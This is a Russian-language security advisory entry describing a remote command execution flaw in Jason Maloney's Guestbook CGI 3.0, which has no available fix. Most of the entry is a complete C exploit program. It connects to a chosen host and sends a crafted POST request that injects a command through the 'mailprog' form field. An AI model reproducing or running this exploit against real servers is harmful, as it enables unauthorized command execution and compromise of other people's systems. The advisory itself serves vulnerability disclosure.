Дата публикации: | 03.12.2003 |
Всего просмотров: | 7034 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Jason Maloney Guestbook 1.x |
Уязвимые версии: Jason Maloney Guestbook 3.0
Описание: Уязвимость обнаружена в Jason Maloney's Guestbook. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может послать специально сформированный POST запрос, чтобы выполнить произвольные команды на целевой системе. Пример/Эксплоит: /* Jason Maloney's Guestbook CGI vulnerability PoF. * * Discovered and written by shaun2k2 - shaunige@yahoo.co.uk. * * A few things in the HTTP headers WILL need to be changed appropriately to custom values for this exploit to WORK. * * Greets to: rider, maveric, sw0rdf1sh, liquidfish, pc_the_great, peter, rizzo, theclone, msViolet, Kankraka, deadprez, hades, the p0pe, port9, Dr Frankenstein, and whitedwarf. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #define PORT 80 int main(int argc, char *argv[]) { if(argc < 2) { printf("Jason Maloney's CGI Guestbook Exploit.\n"); printf("Discovered and written by shaun2k2 - shaunige@yahoo.co.uk\n"); printf("\nUsage: %s <host>\n", argv[0]); exit(-1); } int sock; printf("- Preparing exploit buffer.\n"); char http_request[] = "POST /guestbook/guest.cgi HTTP/1.1" "Host: localhost" "User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.2) Gecko/20021205" "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1" "Accept-Language: en-us,en;q=0.5" "Accept-Encoding: gzip,deflate" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" "Keep-Alive: 300" "Connection: keep-alive" "Referer: http://localhost/guestbook/add.html" "Content-Type: application/x-www-form-urlencoded" "Content-Length: 111" "name=dgf&email=shaunige@yahoo.co.uk&url=http%3A%2F% 2Fdfg&city=dfg&state=dfg&country=USA&comments=dfg&mailprog=evilprog&x=15&y=20"; struct sockaddr_in dest; struct hostent *he; if((he = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve hostname!\n"); exit(-1); } if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(-1); } dest.sin_family = AF_INET; dest.sin_addr = *((struct in_addr *)he->h_addr); dest.sin_port = htons(PORT); printf("[!] Connecting.\n"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { perror("connect()"); exit(-1); } printf("[+] Connected!\n"); printf("[*] Sending exploit buffer.\n"); send(sock, http_request, strlen(http_request), 0); sleep(1); printf("[*] Exploit buffer sent!\n"); sleep(1); close(sock); printf("[!] Disconnected.\n"); return(0); URL производителя: http://www.aestheticsurgerycenter.com/scripts/guestbook/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Jason Maloney's CGI Guestbook Remote Command Execution Vulnerability |